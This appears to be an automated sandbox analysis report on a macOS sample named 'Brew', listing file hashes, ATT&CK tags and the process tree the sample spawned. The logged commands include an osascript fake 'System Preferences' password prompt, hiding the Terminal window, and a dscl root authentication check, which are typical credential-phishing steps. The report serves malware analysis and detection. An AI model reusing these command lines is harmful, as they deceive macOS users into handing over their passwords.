037289c207c8e229d728f247c2d7eb1459fb4413fcd4fe662f74c711169a1e08

Analysis

max time kernel
136s
max time network
102s
platform
macos-10.15_amd64
resource
macos-20241101-en
resource tags

arch:amd64arch:i386image:macos-20241101-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
20/03/2025, 20:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Brew/Brew
Size

897KB
MD5

ec7f737de77d8aa8eece7e355e4f49b9
SHA1

bda795abc4f59a27e2bde15f9a65029e43df9036
SHA256

d4e86dbffd226e2aa5efeedd3159e4c72422238860939b370605ec1f07034f96
SHA512

7affc3b3bc1521f0aab1b6f1941ca9205940e3efdae25f04af40f50294a2a02ba892488c1c16cd421999cd47d3fe206e75f9e4122ed656700898ea0532389ee1
SSDEEP

24576:x1w4S05ovKgvTSWNf/7VoQLXkNv1CTqc6VeGAg:x1w4JSSYVf/7VoQLXkNv1CTqc6VeGA

Score

4^/10

execution

Malware Config

Signatures

AppleScript 1 TTPs 4 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e "tell application \"Terminal\" to set visible of front window to false"	Process not Found
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"	Process not Found
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"	Process not Found
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Brew/Brew\""
1⤵
PID:460

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Brew/Brew\""
1⤵
PID:460

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Brew/Brew
1⤵
PID:460
- /bin/zsh
  /bin/zsh -c /Users/run/Brew/Brew
  2⤵
  PID:461
- /Users/run/Brew/Brew
  /Users/run/Brew/Brew
  2⤵
  PID:461

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:462

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:462

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to set visible of front window to false"
1⤵
PID:462

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.1804
1⤵
PID:463

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:463
- /usr/bin/login
  login -pf run
  2⤵
  PID:465
- - /bin/zsh
    -zsh
    3⤵
    PID:466
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:467
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:469

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:497

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged --privileged
1⤵
PID:497

/bin/sh
sh -c "mkdir /Users/root/1422189908"
1⤵
PID:504

/bin/bash
sh -c "mkdir /Users/root/1422189908"
1⤵
PID:504

/bin/mkdir
mkdir /Users/root/1422189908
1⤵
PID:504

/bin/sh
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:505

/bin/bash
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:505

/usr/bin/dscl
dscl /Local/Default -authonly root
1⤵
PID:505

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:506

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:506

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:506

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/db/nsurlstoraged/dafsaData.bin

Filesize
54KB

MD5
64f469698e53d0c828b7f90acd306082

SHA1
bcc041b3849e1b0b4104ffeb46002207eeac54f3

SHA256
d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

SHA512
a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

Download Submit